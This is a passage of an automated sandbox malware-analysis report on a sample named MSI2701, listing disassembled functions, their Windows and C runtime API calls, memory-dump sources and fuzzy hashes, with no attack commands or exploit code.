                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C4371
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C4399
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C43B5
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C43D3
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C43EF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1711917922-0
                                                                                                                                                            • Opcode ID: 9083ebe6b5f92783f7f0096c012bef20fac00b215e83bd120836504b22e85a92
                                                                                                                                                            • Instruction ID: ffc88952737243a8c98ee7f6e2112fa4049774b2a0eba3abe563ff61f1b6758e
                                                                                                                                                            • Opcode Fuzzy Hash: 9083ebe6b5f92783f7f0096c012bef20fac00b215e83bd120836504b22e85a92
                                                                                                                                                            • Instruction Fuzzy Hash: 81515B74E01258ABDB10CF98DA98BEFBBF4BB88714F24425DE910B7390C7745D058BA8
                                                                                                                                                            Function 004DBBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DBBC4
                                                                                                                                                              • Part of subcall function 004D254E: __EH_prolog3.LIBCMT ref: 004D2555
                                                                                                                                                              • Part of subcall function 004D254E: std::_Lockit::_Lockit.LIBCPMT ref: 004D255F
                                                                                                                                                              • Part of subcall function 004D254E: std::_Lockit::~_Lockit.LIBCPMT ref: 004D25D0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                            • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                            • API String ID: 1538362411-2891247106
                                                                                                                                                            • Opcode ID: 6d08d987c22504bc864a2df73e676e8b2fe14837c3bc74519689af5a13befa2e
                                                                                                                                                            • Instruction ID: 4be892f820a04f71b1723c962dda49a71fe3b603b6fc672fe643eaa45333fc15
                                                                                                                                                            • Opcode Fuzzy Hash: 6d08d987c22504bc864a2df73e676e8b2fe14837c3bc74519689af5a13befa2e
                                                                                                                                                            • Instruction Fuzzy Hash: F0B18B7150010AEACF19DF68CD79EFF3BA9FB04304F06411BFA46A6351D7398A119B99
                                                                                                                                                            Function 004E0C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004E0CA4
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92A0
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92C2
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C92EA
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C9422
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                            • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                            • API String ID: 1383202999-2891247106
                                                                                                                                                            • Opcode ID: ed45303aa0876982d832273c3d766e97ed1e859a76f29ffc895f8ab7c253e21b
                                                                                                                                                            • Instruction ID: 8065075fef1f7dde31670702f942c1ea909cb46de7258528a0e5c0602e4ee20e
                                                                                                                                                            • Opcode Fuzzy Hash: ed45303aa0876982d832273c3d766e97ed1e859a76f29ffc895f8ab7c253e21b
                                                                                                                                                            • Instruction Fuzzy Hash: 26B1DF7150018AABCF29DFAACC59DBF3BA9FF04305F04011BF952A2261D6B9D991CB19
                                                                                                                                                            Function 004DBF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004DBF85
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8657
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8679
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C86A1
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C880E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                            • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                            • API String ID: 1383202999-2891247106
                                                                                                                                                            • Opcode ID: f7089070d89a5ca45aecb063ec9f7cf70ee6c981e26d49c278becf4406a8e95d
                                                                                                                                                            • Instruction ID: 8c8c7bea09893adddccc8ce801c68ecf3e7905e869509a1b0ff6bae1155e7f92
                                                                                                                                                            • Opcode Fuzzy Hash: f7089070d89a5ca45aecb063ec9f7cf70ee6c981e26d49c278becf4406a8e95d
                                                                                                                                                            • Instruction Fuzzy Hash: E1B18E7190010BAFCF199EA4C9A5DBF3BA9FB09344F14411BFA42A2391D6398A11DB59
                                                                                                                                                            Function 004C3C20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 225libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004C36D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004C3735
                                                                                                                                                              • Part of subcall function 004C36D0: _wcschr.LIBVCRUNTIME ref: 004C37C6
                                                                                                                                                            • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 004C3CA8
                                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 004C3D01
                                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 004C3D7A
                                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 004C3EB1
                                                                                                                                                            • GetLastError.KERNEL32 ref: 004C3F34
                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004C3F7B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                                            • String ID: NtQueryInformationProcess$1Q
                                                                                                                                                            • API String ID: 566592816-1657583799
                                                                                                                                                            • Opcode ID: 0b6b0efe1b3c9d64ff4bbbc8649f79db64dd3a6bdc71d41ba994e141f14c41aa
                                                                                                                                                            • Instruction ID: a326cea8eb0f5103cf40a2ab3d33973a77310e65645db411be4f54cc14ad1598
                                                                                                                                                            • Opcode Fuzzy Hash: 0b6b0efe1b3c9d64ff4bbbc8649f79db64dd3a6bdc71d41ba994e141f14c41aa
                                                                                                                                                            • Instruction Fuzzy Hash: 77A16C74D04649DEDB60CF64CC58BAEBBF0BF48308F10459ED449A7280E7B96A88CF95
                                                                                                                                                            Function 004E3F20 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 004E3F57
                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 004E3F5F
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 004E3FE8
                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004E4013
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 004E4068
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                            • String ID: 2N$TGN$csm
                                                                                                                                                            • API String ID: 1170836740-188400833
                                                                                                                                                            • Opcode ID: 8f666751deffcf649071c8d390ae78bd27ff09e4d0403a63312fac70fd42f1af
                                                                                                                                                            • Instruction ID: fb307138ff9ecf303c7bd5b0ed94f2a243811008f553cb0bd7723f2a79a02f9c
                                                                                                                                                            • Opcode Fuzzy Hash: 8f666751deffcf649071c8d390ae78bd27ff09e4d0403a63312fac70fd42f1af
                                                                                                                                                            • Instruction Fuzzy Hash: 8441F534E002499BCF11DF6AC888A9EBFB5BF4431AF04809AF8145B392C735AE05CB94
                                                                                                                                                            Function 004D8555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004D855C
                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 004D85C5
                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 004D85D7
                                                                                                                                                            • _Maklocchr.LIBCPMT ref: 004D85EF
                                                                                                                                                            • _Maklocchr.LIBCPMT ref: 004D85FF
                                                                                                                                                            • _Getvals.LIBCPMT ref: 004D8621
                                                                                                                                                              • Part of subcall function 004D1CD4: _Maklocchr.LIBCPMT ref: 004D1D03
                                                                                                                                                              • Part of subcall function 004D1CD4: _Maklocchr.LIBCPMT ref: 004D1D19
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                                            • String ID: false$true
                                                                                                                                                            • API String ID: 3549167292-2658103896
                                                                                                                                                            • Opcode ID: 1aa591d0d1253d6b700575cfefe270a9ef3d1629369c8eec682ee79e739776b6
                                                                                                                                                            • Instruction ID: 900cf915ad6c8b7ef9d1a63688750918b48494c07a914cca4e56f3dec281f19d
                                                                                                                                                            • Opcode Fuzzy Hash: 1aa591d0d1253d6b700575cfefe270a9ef3d1629369c8eec682ee79e739776b6
                                                                                                                                                            • Instruction Fuzzy Hash: 66214FB1D00318BADF14EFA6D895ADE7BA8AF04714F00815FB904AF252EA789540CBA5
                                                                                                                                                            Function 004C9730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 004C9763
                                                                                                                                                              • Part of subcall function 004D0C94: __EH_prolog3.LIBCMT ref: 004D0C9B
                                                                                                                                                              • Part of subcall function 004D0C94: std::_Lockit::_Lockit.LIBCPMT ref: 004D0CA6
                                                                                                                                                              • Part of subcall function 004D0C94: std::locale::_Setgloballocale.LIBCPMT ref: 004D0CC1
                                                                                                                                                              • Part of subcall function 004D0C94: std::_Lockit::~_Lockit.LIBCPMT ref: 004D0D17
                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004C978A
                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004C97F0
                                                                                                                                                            • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 004C984A
                                                                                                                                                              • Part of subcall function 004CF57A: __EH_prolog3.LIBCMT ref: 004CF581
                                                                                                                                                              • Part of subcall function 004CF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004CF5C8
                                                                                                                                                              • Part of subcall function 004CF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004CF620
                                                                                                                                                              • Part of subcall function 004CF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004CF654
                                                                                                                                                              • Part of subcall function 004CF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004CF6A8
                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,?,005154B1,00000000), ref: 004C99BF
                                                                                                                                                            • __cftoe.LIBCMT ref: 004C9B0B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                            • API String ID: 3103716676-1405518554
                                                                                                                                                            • Opcode ID: c3dad8abdb8fb90d52549c9bc15e9c0c75ce1a942f5b1cf6ef48acb44ae767ca
                                                                                                                                                            • Instruction ID: b783c63dd01fa4e2d686aec28027e50ebf084f5459a4e85710e44a1c973c2b89
                                                                                                                                                            • Opcode Fuzzy Hash: c3dad8abdb8fb90d52549c9bc15e9c0c75ce1a942f5b1cf6ef48acb44ae767ca
                                                                                                                                                            • Instruction Fuzzy Hash: DEF18E75901248EFDB10DFA8C984BAEBBB5FF09304F14416EE405A7381E7799E04CBA5
                                                                                                                                                            Function 004F72FB Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,004F7632,00000021,FlsSetValue,0050BD58,0050BD60,?,?,004F5955,00000006,000000FF,?,004E6CE7,00000000,A8O), ref: 004F73BC
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                            • String ID: A8O$api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3664257935-2336601795
                                                                                                                                                            • Opcode ID: d73808d4c41bb9d9778e8718d092e1552271ec57e2daf58e0b3c1c0e2f022935
                                                                                                                                                            • Instruction ID: 76d29c6387d908b22e153dd8281745674e5061527817b001c7481ca0053fa9eb
                                                                                                                                                            • Opcode Fuzzy Hash: d73808d4c41bb9d9778e8718d092e1552271ec57e2daf58e0b3c1c0e2f022935
                                                                                                                                                            • Instruction Fuzzy Hash: DE21F336A09219BBDB219B65AC41A6F3BA9DF55760F240212FE01A7380D77CFD00E6A5
                                                                                                                                                            Function 004C40B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,40000022,C7C71CC4,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004C4154
                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,3FFFFFFF,C7C71CC4,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004C4177
                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004C4217
                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,C7C71CC4,?,?,?), ref: 004C42D2
                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,C7C71CC4,?,?,?), ref: 004C42F3
                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,C7C71CC4,?,?,?), ref: 004C4326
                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,C7C71CC4,?,?,?), ref: 004C4337
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C4355
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C7C71CC4,?,?,?), ref: 004C4371
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1424318461-0
                                                                                                                                                            • Opcode ID: ba2e56f3c3b1e6ba26efa980c8b50e7ac0e0e9c677539220ff09e91360301725
                                                                                                                                                            • Instruction ID: 8bcb7dc32a745485807767234188037183ab2e129cc39d807bd9d6d4cc2c92d0
                                                                                                                                                            • Opcode Fuzzy Hash: ba2e56f3c3b1e6ba26efa980c8b50e7ac0e0e9c677539220ff09e91360301725
                                                                                                                                                            • Instruction Fuzzy Hash: CF81B175E002059FDB14CFA8D995FAEBBB4FB88310F24422EE925A7390D734AD40CB94
                                                                                                                                                            Function 004E266D Relevance: 12.2, APIs: 8, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 004E26F8
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004E2786
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004E27B0
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004E27F8
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004E2812
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004E2838
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004E2875
                                                                                                                                                            • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004E2892
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3603178046-0
                                                                                                                                                            • Opcode ID: 9abf74ad4debbc6228805a8857db108069867252505672036476c163ab3a80d7
                                                                                                                                                            • Instruction ID: b322b5ec726141aa73199adbdde2fd72eb80d2f8677474ff7a3448a6ecddb433
                                                                                                                                                            • Opcode Fuzzy Hash: 9abf74ad4debbc6228805a8857db108069867252505672036476c163ab3a80d7
                                                                                                                                                            • Instruction Fuzzy Hash: DF71C575900289ABDF219F66CE45AEF7BBDBF45312F18025BE904A7250D7B9C900CB68
                                                                                                                                                            Function 004E215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 004E21A3
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004E21CF
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 004E220E
                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004E222B
                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004E226A
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004E2287
                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004E22C9
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004E22EC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                                            • Opcode ID: 62cf5803dc803e9df7e9830b92356ba6683ff4f20f8bba978771d4452a7fe932
                                                                                                                                                            • Instruction ID: 40dd0acb2b88a5d2e9a80ea4e744988d4bea97edbffbc5e450534dacb549a96a
                                                                                                                                                            • Opcode Fuzzy Hash: 62cf5803dc803e9df7e9830b92356ba6683ff4f20f8bba978771d4452a7fe932
